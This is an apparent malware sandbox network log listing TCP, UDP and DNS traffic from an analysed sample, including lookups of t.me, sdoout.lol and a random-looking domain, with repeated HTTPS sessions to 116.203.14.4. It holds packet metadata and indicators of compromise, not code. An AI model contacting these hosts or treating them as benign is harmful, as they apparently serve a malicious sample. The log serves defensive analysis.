Dec 31, 2024 16:58:00.902275085 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.902770042 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.902832031 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.902867079 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.902868032 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.902879953 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.902884007 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.902924061 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.902966976 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.902971983 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.902992010 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.902998924 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.903031111 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.903069973 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.903075933 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.903095961 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.903105974 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.903142929 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.903193951 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.903208017 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.903215885 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.903229952 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.903237104 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.903290033 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.903295994 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.903342962 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.903387070 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.903403997 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.904027939 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.904133081 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.904165983 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.904176950 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.904190063 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.904525042 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.904609919 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.904644966 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.904680014 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.904684067 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.904701948 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.904712915 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.904737949 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.904784918 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.904797077 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.904800892 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.904813051 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.904819012 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.904845953 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.904889107 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.904895067 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.904906034 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.904910088 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.904934883 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.905009985 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.905034065 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.905088902 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.905103922 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.905184031 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.905257940 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.905441046 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.905540943 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.905610085 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.905699968 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.905787945 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.905808926 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.905843973 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.905965090 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.906306028 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.906443119 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.906472921 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.906486988 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.947334051 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.948595047 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.949218988 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.949244976 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.951036930 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.951366901 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.951493025 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.951524973 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.951543093 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.951595068 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.951606035 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.951777935 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.951790094 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.951829910 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.951837063 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.951879978 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.951889038 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.951901913 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.951936960 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.951951981 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.951963902 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.951982021 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.952018976 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.952054024 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.952083111 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.972809076 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.972827911 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.972975016 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.972995996 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.973061085 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.973112106 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.973157883 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.973170996 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.973212004 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.973222971 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.973336935 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.973381996 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.973582029 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:01.015336037 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:01.023216963 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:01.023344040 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:01.023371935 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:01.023375034 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:01.023466110 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:01.023583889 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:01.023638010 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:01.023694992 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:01.023787022 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:01.023809910 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:01.024081945 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:01.024239063 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:01.024283886 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:01.024324894 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:01.024334908 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:01.024379015 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:01.024409056 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:01.024525881 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:01.045130014 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:01.045243979 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:01.045320988 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:01.045358896 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:01.045437098 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:01.045456886 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:01.045516014 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:01.045558929 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:01.045628071 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:01.045734882 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:01.045747995 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:01.050910950 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:01.050987959 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:01.051120996 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:01.051165104 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:01.051187038 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:01.051270008 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:01.051368952 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:01.051536083 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:01.051672935 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:01.051789999 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:01.051882982 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:01.052073002 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:01.052176952 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:01.052273989 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:01.052350998 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:01.052448988 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:01.052536964 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:01.052575111 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:01.052591085 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:01.052604914 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:01.052644968 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:01.052658081 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:01.052684069 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:01.052730083 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:01.052772045 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:01.052836895 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:01.052860022 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:01.052933931 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:01.053010941 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:01.053087950 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:01.053191900 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:01.053622961 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:01.053859949 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:01.053996086 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:01.054020882 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:01.054070950 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:01.055912018 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:01.056548119 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:01.056585073 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:01.056921959 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:01.057688951 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:01.100023985 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:01.194617987 CET	51522	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:01.194710016 CET	443	51522	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:01.194792032 CET	51522	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:01.195060968 CET	51522	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:01.195112944 CET	443	51522	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:01.835103035 CET	443	51522	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:01.835289001 CET	51522	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:01.835843086 CET	51522	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:01.835854053 CET	443	51522	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:01.837770939 CET	51522	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:01.837776899 CET	443	51522	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:02.473951101 CET	443	51522	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:02.473973989 CET	443	51522	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:02.474031925 CET	443	51522	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:02.474138021 CET	51522	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:02.474138021 CET	51522	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:02.474138021 CET	51522	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:02.474343061 CET	51522	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:02.474385023 CET	443	51522	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:02.477309942 CET	51523	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:02.477353096 CET	443	51523	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:02.477417946 CET	51523	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:02.491945028 CET	51523	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:02.491961956 CET	443	51523	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:03.154520988 CET	443	51523	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:03.154592991 CET	51523	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:03.155045033 CET	51523	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:03.155054092 CET	443	51523	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:03.156739950 CET	51523	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:03.156744957 CET	443	51523	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:03.844074011 CET	443	51523	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:03.844094038 CET	443	51523	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:03.844145060 CET	443	51523	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:03.844168901 CET	51523	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:03.844189882 CET	51523	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:03.844404936 CET	51523	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:03.844420910 CET	443	51523	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:03.859587908 CET	51524	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:03.859679937 CET	443	51524	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:03.859775066 CET	51524	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:03.859957933 CET	51524	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:03.860007048 CET	443	51524	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:04.534924030 CET	443	51524	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:04.535022974 CET	51524	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:04.535533905 CET	51524	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:04.535546064 CET	443	51524	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:04.537441969 CET	51524	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:04.537448883 CET	443	51524	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:05.190325022 CET	443	51524	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:05.190380096 CET	443	51524	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:05.190387964 CET	51524	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:05.190419912 CET	51524	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:05.191159964 CET	51524	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:05.191171885 CET	443	51524	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:07.677834034 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:07.677926064 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:07.678009033 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:07.679282904 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:07.679321051 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:07.925791025 CET	51526	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:07.925863028 CET	443	51526	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:07.925950050 CET	51526	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:07.926217079 CET	51526	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:07.926234007 CET	443	51526	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:08.583811998 CET	443	51526	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:08.583869934 CET	51526	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:08.584333897 CET	51526	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:08.584347963 CET	443	51526	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:08.586414099 CET	51526	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:08.586421013 CET	443	51526	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:09.275230885 CET	443	51526	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:09.275291920 CET	51526	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:09.275325060 CET	443	51526	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:09.275338888 CET	443	51526	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:09.275381088 CET	51526	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:09.275594950 CET	51526	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:09.275613070 CET	443	51526	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:09.276870012 CET	51528	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:09.276911020 CET	443	51528	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:09.276988983 CET	51528	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:09.277179003 CET	51528	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:09.277199030 CET	443	51528	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:09.948390007 CET	443	51528	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:09.948492050 CET	51528	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:09.948956966 CET	51528	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:09.948966026 CET	443	51528	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:09.950752974 CET	51528	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:09.950757027 CET	443	51528	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:10.628278017 CET	443	51528	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:10.628365993 CET	443	51528	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:10.629221916 CET	51528	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:10.631431103 CET	51528	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:10.631449938 CET	443	51528	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:20.556627035 CET	49723	80	192.168.2.4	199.232.210.172
Dec 31, 2024 16:58:20.556662083 CET	49724	80	192.168.2.4	199.232.210.172
Dec 31, 2024 16:58:20.561602116 CET	80	49723	199.232.210.172	192.168.2.4
Dec 31, 2024 16:58:20.561671972 CET	49723	80	192.168.2.4	199.232.210.172
Dec 31, 2024 16:58:20.561877012 CET	80	49724	199.232.210.172	192.168.2.4
Dec 31, 2024 16:58:20.561920881 CET	49724	80	192.168.2.4	199.232.210.172

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 31, 2024 16:57:15.948684931 CET	54881	53	192.168.2.4	1.1.1.1
Dec 31, 2024 16:57:16.765259981 CET	53	54881	1.1.1.1	192.168.2.4
Dec 31, 2024 16:57:30.682701111 CET	50699	53	192.168.2.4	1.1.1.1
Dec 31, 2024 16:57:30.689615965 CET	53	50699	1.1.1.1	192.168.2.4
Dec 31, 2024 16:57:31.604661942 CET	65286	53	192.168.2.4	1.1.1.1
Dec 31, 2024 16:57:31.616580009 CET	53	65286	1.1.1.1	192.168.2.4
Dec 31, 2024 16:57:32.126092911 CET	138	138	192.168.2.4	192.168.2.255
Dec 31, 2024 16:57:41.861994982 CET	53	58015	1.1.1.1	192.168.2.4
Dec 31, 2024 16:57:41.882107019 CET	53	54340	1.1.1.1	192.168.2.4
Dec 31, 2024 16:57:42.042843103 CET	65264	53	192.168.2.4	1.1.1.1
Dec 31, 2024 16:57:42.043047905 CET	51972	53	192.168.2.4	1.1.1.1
Dec 31, 2024 16:57:42.049815893 CET	53	51972	1.1.1.1	192.168.2.4
Dec 31, 2024 16:57:42.050040007 CET	53	65264	1.1.1.1	192.168.2.4
Dec 31, 2024 16:57:42.917447090 CET	53	63092	1.1.1.1	192.168.2.4
Dec 31, 2024 16:57:43.802915096 CET	53	61032	1.1.1.1	192.168.2.4
Dec 31, 2024 16:57:46.002341986 CET	60142	53	192.168.2.4	1.1.1.1
Dec 31, 2024 16:57:46.002511024 CET	53205	53	192.168.2.4	1.1.1.1
Dec 31, 2024 16:57:46.007026911 CET	53	63449	1.1.1.1	192.168.2.4
Dec 31, 2024 16:57:46.008970022 CET	53	60142	1.1.1.1	192.168.2.4
Dec 31, 2024 16:57:46.010077000 CET	53	53205	1.1.1.1	192.168.2.4
Dec 31, 2024 16:57:46.938513994 CET	53	62834	1.1.1.1	192.168.2.4
Dec 31, 2024 16:57:46.997935057 CET	62102	53	192.168.2.4	1.1.1.1
Dec 31, 2024 16:57:46.998123884 CET	55602	53	192.168.2.4	1.1.1.1
Dec 31, 2024 16:57:47.004898071 CET	53	62102	1.1.1.1	192.168.2.4
Dec 31, 2024 16:57:47.005172968 CET	53	55602	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 31, 2024 16:57:15.948684931 CET	192.168.2.4	1.1.1.1	0xa6b8	Standard query (0)	GeVuzPdhfiKPHBwrLx.GeVuzPdhfiKPHBwrLx	A (IP address)	IN (0x0001)	false
Dec 31, 2024 16:57:30.682701111 CET	192.168.2.4	1.1.1.1	0xcde4	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false
Dec 31, 2024 16:57:31.604661942 CET	192.168.2.4	1.1.1.1	0xa77b	Standard query (0)	sdoout.lol	A (IP address)	IN (0x0001)	false
Dec 31, 2024 16:57:42.042843103 CET	192.168.2.4	1.1.1.1	0x4735	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Dec 31, 2024 16:57:42.043047905 CET	192.168.2.4	1.1.1.1	0xa749	Standard query (0)	www.google.com	65	IN (0x0001)	false
Dec 31, 2024 16:57:46.002341986 CET	192.168.2.4	1.1.1.1	0x4070	Standard query (0)	apis.google.com	A (IP address)	IN (0x0001)	false
Dec 31, 2024 16:57:46.002511024 CET	192.168.2.4	1.1.1.1	0x196a	Standard query (0)	apis.google.com	65	IN (0x0001)	false
Dec 31, 2024 16:57:46.997935057 CET	192.168.2.4	1.1.1.1	0xd9dd	Standard query (0)	play.google.com	A (IP address)	IN (0x0001)	false
Dec 31, 2024 16:57:46.998123884 CET	192.168.2.4	1.1.1.1	0x70a9	Standard query (0)	play.google.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 31, 2024 16:57:16.765259981 CET	1.1.1.1	192.168.2.4	0xa6b8	Name error (3)	GeVuzPdhfiKPHBwrLx.GeVuzPdhfiKPHBwrLx	none	none	A (IP address)	IN (0x0001)	false
Dec 31, 2024 16:57:30.689615965 CET	1.1.1.1	192.168.2.4	0xcde4	No error (0)	t.me		149.154.167.99	A (IP address)	IN (0x0001)	false
Dec 31, 2024 16:57:31.616580009 CET	1.1.1.1	192.168.2.4	0xa77b	No error (0)	sdoout.lol		116.203.14.4	A (IP address)	IN (0x0001)	false
Dec 31, 2024 16:57:42.049815893 CET	1.1.1.1	192.168.2.4	0xa749	No error (0)	www.google.com			65	IN (0x0001)	false
Dec 31, 2024 16:57:42.050040007 CET	1.1.1.1	192.168.2.4	0x4735	No error (0)	www.google.com		172.217.16.196	A (IP address)	IN (0x0001)	false
Dec 31, 2024 16:57:46.008970022 CET	1.1.1.1	192.168.2.4	0x4070	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 31, 2024 16:57:46.008970022 CET	1.1.1.1	192.168.2.4	0x4070	No error (0)	plus.l.google.com		172.217.18.14	A (IP address)	IN (0x0001)	false
Dec 31, 2024 16:57:46.010077000 CET	1.1.1.1	192.168.2.4	0x196a	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
